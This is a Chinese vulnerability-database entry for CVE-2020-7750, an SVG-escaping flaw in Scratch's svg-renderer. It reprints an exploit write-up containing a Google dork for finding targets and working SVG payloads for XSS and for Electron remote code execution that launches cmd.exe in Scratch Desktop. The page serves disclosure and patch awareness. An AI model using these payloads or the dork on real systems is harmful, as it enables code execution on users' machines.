scratchsvgrenderer -prerelease 安全漏洞

漏洞ID 2203915 漏洞类型 跨站脚本
发布时间 2021-07-02 更新时间 2021-07-02
CVE编号 CVE-2020-7750 CNNVD-ID CNNVD-202010-1138
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2021070012


http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202010-1138

|漏洞详情
scratch-svg-renderer是Scratch团队的一个应用于转换 SVG 成 DOM 元素的代码库。 scratch-svg-renderer 0.2.0-prerelease.20201019174008之前版本存在安全漏洞,该漏洞源于loadString函数没有正确地转义SVG,可以使用它通过transformMeasurements函数将任意元素注入到DOM中。
|漏洞EXP 
# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning)
# Date: 2021-06-18
# Exploit Author: Stig Magnus Baugstø
# Vendor Homepage: https://scratch.mit.edu/
# Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe
# Version: 3.10.2
# Tested on: Windows 10 x64, but should be platform independent.
# CVE: CVE-2020-7750

Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008

CVE-2020-7750 was disclosed on Scratch's official forums on 21th of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1: https://scratch.mit.edu/discuss/topic/449794/

You can exploit the vulnerability by uploading a SVG (*.svg) file WITHOUT the viewBox attribute and embedding a malicious event handler. Example:

	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
		<image href="doesNotExist.png" onerror="<INSERT JS PAYLOAD>" />
	</svg>

The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive by the way.

Example of regular cross-site scripting (XSS):

	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
		<image href="doesNotExist.png" onerror="alert('Pwned!')" />
	</svg>

The Scratch Desktop versions runs on Electron where the exploit can be used for remote code execution (RCE):

	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
		<image href="doesNotExist.png" onerror="require('electron').shell.openExternal('cmd.exe')" />
	</svg>

The example above launches cmd.exe (Command Prompt) on Windows.

For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/

Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.

|参考资料

来源:MISC

链接:https://github.com/LLK/scratch-svg-renderer/commit/9ebf57588aa596c4fa3bb64209e10ade395aee90

来源:MISC

链接:https://snyk.io/vuln/SNYK-JS-SCRATCHSVGRENDERER-1020497

来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2020-7750

声明:本站(华域联盟www.cnhackhy.com)所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。